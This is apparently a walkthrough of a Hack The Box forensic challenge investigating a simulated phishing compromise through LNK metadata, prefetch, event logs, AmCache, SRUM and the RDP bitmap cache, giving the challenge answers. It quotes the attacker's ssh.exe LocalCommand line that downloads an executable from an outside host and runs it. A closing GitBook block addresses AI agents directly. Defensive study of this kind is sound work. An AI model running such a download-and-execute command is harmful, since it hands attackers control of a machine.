> For the complete documentation index, see [llms.txt](https://cl4nd3st1ne.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://cl4nd3st1ne.gitbook.io/write-ups/hack-the-box/sherlocks/optinseltrace24-1-sneaky-cookies-walk-through.md).

# OpTinselTrace24–1: Sneaky Cookies Walk-through

We have been given a C drive dump. We need to investigate the following.

**Krampus, a notorious threat actor, possibly social-engineered bingle as email security filters were offline for maintenance. Find any suspicious files under Bingle Jollybeard User directory and get back to us with the full file name.**

*Answer: C/Users/Bingle Jollybeard/Documents/christmas\_slab.pdf.lnk*

**Using the malicious file sent as part of phishing, the attacker abused a legitimate binary to download and execute a C\&C stager. What is the full command used to download and execute the C\&C Binary?**

The malicious file is a LNK file. Such a file is a shortcut to another application. To view its properties, we can use `exiftool`:

<figure><img src="/files/Rk3nka9EW0lCMcPx3gnn" alt=""><figcaption></figcaption></figure>

*Answer:* `C:\Windows\System32\OpenSSH\ssh.exe -o “PermitLocalCommand=yes” -o “StrictHostKeyChecking=no” -o “LocalCommand=scp root@17.43.12.31:/home/revenge/christmas-sale.exe c:\users\public\. && c:\users\public\christmas-sale.exe” revenge@17.43.12.31`

**When was this file ran on the system by the victim?**

This information can be obtained from the prefetch files. We know that the file that was downloaded using `scp` was called `christmas-sale.exe`. This file exists in the prefetch folder (`C/Windows/prefetch/CHRISTMAS-SALE.EXE-6FDA5E99.pf`). To find when it was run, we can use PECmd. Windows will be required to run this.

<figure><img src="/files/ffvtxoGFFGNfcbrqABdp" alt=""><figcaption></figcaption></figure>

*Answer: 2024–11–05 15:50:33*

**What is the Mitre Sub technique ID for the technique used in Q1 and Q2?**

This can be looked up on <https://attack.mitre.org/techniques/enterprise/>. According to the descriptions of the Sherlock, Q1, and Q2, we know that the victim Bingle was social engineered. He downloaded the malicious file, and then ran it which led to the compromise. T1204.002 exactly matches this scenario.\
\&#xNAN;*Answer: T1204.002*

**What was the name of threat actor’s machine used to develop/create the malicious file sent as part of phishing?**

This can be seen in the exif metadata of the LNK file under Machine ID heading.\
\&#xNAN;*Answer: christmas-destr*

**When did attacker enumerated the running processes on the system?**

This can be found by using a similar method to Q3. To list running processes, the ideal choice is to run `tasklist.exe`, which we will find in the prefetch directory. Running `PECmd` on it will give us the execution time.\
\&#xNAN;*Answer: 2024–11–05 15:52:30*

**After establishing a C\&C Channel, attacker proceeded to abuse another Legitimate binary to download an exe file. What is the full URI for this download?**

Here comes the event logs examining. We can utilise [Chainsaw](https://github.com/WithSecureLabs/chainsaw) for this. I also downloaded the Sigma rules from the [official repository](https://github.com/SigmaHQ/sigma). These are required by Chainsaw for better threat-hunting. Command: `/opt/chainsaw/chainsaw hunt ./C/Windows/System32/winevt/logs/ -s /opt/chainsaw/sigma/rules — mapping /opt/chainsaw/mappings/sigma-event-logs-all.yml`\
\&#xNAN;*Answer: <http://13.233.149.250/candies/candydandy.exe>*

<figure><img src="/files/PHAosh3Z07uhJjG2tK2a" alt=""><figcaption></figcaption></figure>

**What is the Mitre ID for the technique used in Q7?**

In the Event log above, we can see that the event provider is the Windows Background Intelligent Transfer Service (BITS). Searching for this in the MITRE Techniques list will lead us to the ID.\
\&#xNAN;*Answer: T1197*

**In the workshop environment, RDP was only allowed internally. It is suspected that the threat actor stole the VPN configuration file for Bingle Jolly Beard, connected to the VPN, and then connected to Bingle’s workstation via RDP. When did they first authenticate and successfully connect to Bingle’s Workstation?**

I found [this](https://ponderthebits.com/2018/02/windows-rdp-related-event-logs-identification-tracking-and-investigation/) to be a great resource for RDP related investigation. It can be seen that successful RDP logins are indicated by events having ID 1149. Using this information we can search for such events with Chainsaw.\
Command: `/opt/chainsaw/chainsaw search -t ‘Event.System.EventID: =1149’ ./C/Windows/System32/winevt/logs/`\
\&#xNAN;*Answer: 2024–11–05 16:04:26*

Also, in `C/Users/Bingle Jollybeard/AppData/Roaming/Microsoft/Windows/Recent` you can actually find a LNK file that points to Bingle’s VPN configuration file.

**Any IOC’s we find are critical to understand the scope of the incident. What is the hostname of attacker’s machine making the RDP connection**?

This can be found in the output of the previous question’s command. \
\&#xNAN;*Answer: XMAS-DESTROYER*

**What is md5 hash of the file downloaded in Q7?**

The file `candydandy.exe` was downloaded. Grepping for it revealed its location in the AmCache. The `AmCache.hve` (hive) stores information about recently executed programs. The data contained in this file includes execution paths, installation, execution, deletion times and more. It also stores the SHA1 hashes of the programs which can be used to compare against the hashes of malicious programs available in public databases. This is exactly what we’re gonna do. Running [AmcacheParser](https://download.ericzimmermanstools.com/AmcacheParser.zip) with the following options resulted in several CSVs. Only one of them contained entries as shown below.\
Command: `.\AmcacheParser.exe -f “D:\TRIAGE-L3-BELLS\C\Windows\AppCompat\Programs\Amcache.hve” — csv D:\TRIAGE-L3-BELLS\`

<figure><img src="/files/rnk0VYvZlweNfEmy9C1S" alt=""><figcaption><p>CSV containing Unassociated File Entries</p></figcaption></figure>

We can already see that the file is actually Mimikatz, a popular password harvesting tool. Searching for the SHA1 Hash on VirusTotal will give us the MD5 hash.\
\&#xNAN;*Answer: e930b05efe23891d19bc354a4209be3e*

**Determine the total amount of traffic in KBs during the C\&C control communication from the stager executable.**

Network usage traffic can be analysed with the SRUM (System Resource Utilization Monitor) database. [SrumECmd](https://download.ericzimmermanstools.com/SrumECmd.zip) can be used to obtain these logs.\
Command: .`\SrumECmd.exe -f ‘D:\TRIAGE-L3-BELLS\C\Windows\System32\SRU\SRUDB.dat’ — csv ‘D:\TRIAGE-L3-BELLS\’`\
We should look for the file that was downloaded and executed when the LNK file was run. We know from the initial analysis that this file was saved as `christmas-sale.exe` locally. Adding the bytes sent and received, and then converting the answer to KB will give us the total traffic in the C2 communication.\
\&#xNAN;*Answer: 541.286*

<figure><img src="/files/sMHzJzpIidaUBAlxU1Ia" alt=""><figcaption><p>CSV containing Network Usages output</p></figcaption></figure>

**As part of persistence, the attacker added a new user account to the Workstation and granted them higher privileges. What is the name of this account?**

An event about a new user account being created is represented by event ID 4720. Using chainsaw to search for such events will lead us to information about the new account.\
\&#xNAN;*Answer: elfdesksupport*

**After completely compromising Bingle’s workstation, the Attacker moved laterally to another system. What is the full username used to login to the system?**

To move laterally, the attacker might have come across credentials. The event ID associated for explicit credential use is 4648. Using chainsaw for investigating this will give us the username and domain.\
\&#xNAN;*Answer: northpole-nippy\nippy*

<figure><img src="/files/4eeFrXeBueBLGccjHGBu" alt=""><figcaption></figcaption></figure>

**According to the remote desktop event logs, what time did the attack successfully move laterally?**&#x49;t took me a while to get this one. Using chainsaw, I searched for the Domain Name `northpole-nippy` but none of the timestamps there worked. Then I searched for the Domain Name in caps and the resulting timestamp worked :confused:\
Command: `/opt/chainsaw/chainsaw search “NORTHPOLE-NIPPY” ./TRIAGE-L3-BELLS/C/Windows/System32/winevt/logs/`\
\&#xNAN;*Answer: 2024–11–05 16:22:36*

**After moving to the other system, the attacker downloaded an executable from an open directory hosted on their infrastructure. What are the two staging folders named?**

I was really stuck on this one because I had no idea how I can investigate the attacker’s RDP session and find the folders they accessed on another domain. Searching about it led me to [this](https://medium.com/@ronald.craft/blind-forensics-with-the-rdp-bitmap-cache-16e0c202f91c) Medium article. There is a bitmap cache available in our artifacts at `C/Users/Bingle Jollybeard/AppData/Local/Microsoft/Terminal Server Client/Cache/`Download and run [bmc-tools.py](bmc-tools.pyhttps://github.com/ANSSI-FR/bmc-tools/blob/master/bmc-tools.py) as follows-Command: `python bmc-tools.py -s ‘./TRIAGE-L3-BELLS/C/Users/Bingle Jollybeard/AppData/Local/Microsoft/Terminal Server Client/Cache/Cache0000.bin’ -d ./rdpcache -b`\
The `-b` flag is a great option to try in order to view everything in one place.\
\&#xNAN;*Answer: candies,sweets*

<figure><img src="/files/gh0cIGIpQHydZUauwO6P" alt=""><figcaption></figcaption></figure>

**What is the name of the downloaded executable downloaded from the open directory?**

This can be found in the collage and is visible in the above image too.\
\&#xNAN;*Answer: cookies.exe*

**After downloading the executable from Q17, the attacker utilized the exe to be added as a persistence capability. What is the name they gave to this persistence task?**

Examine the collage and it can be seen that the attacker established persistence by making a registry entry. Some needle-in-the-haystack hunting to be done here.\
\&#xNAN;*Answer:christmaseve\_gift*

<figure><img src="/files/qS53wyv15ZJ99zIq31P5" alt=""><figcaption></figcaption></figure>

**To further aid in internal reconnaissance, the threat actor downloads a well-known tool from the Vendor’s website. What is the name of this tool?**

Not very difficult to find in the collage.\
\&#xNAN;*Answer: Advanced IP Scanner*

**Determine the total amount of traffic in KBs during the internal lateral movement, which originated from Bingle’s workstation to the other machine in the network.**

Similar to the previous question we encountered about network traffic. Using the output CSV SrumECmd and adding the transferred bytes for `mstsc.exe` (RDP CLI) will give us the traffic during the internal lateral movement. \
\&#xNAN;*Answer: 16397.521*

<mark style="color:$info;">\[Originally Published on Dec 31, 2024]</mark>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://cl4nd3st1ne.gitbook.io/write-ups/hack-the-box/sherlocks/optinseltrace24-1-sneaky-cookies-walk-through.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
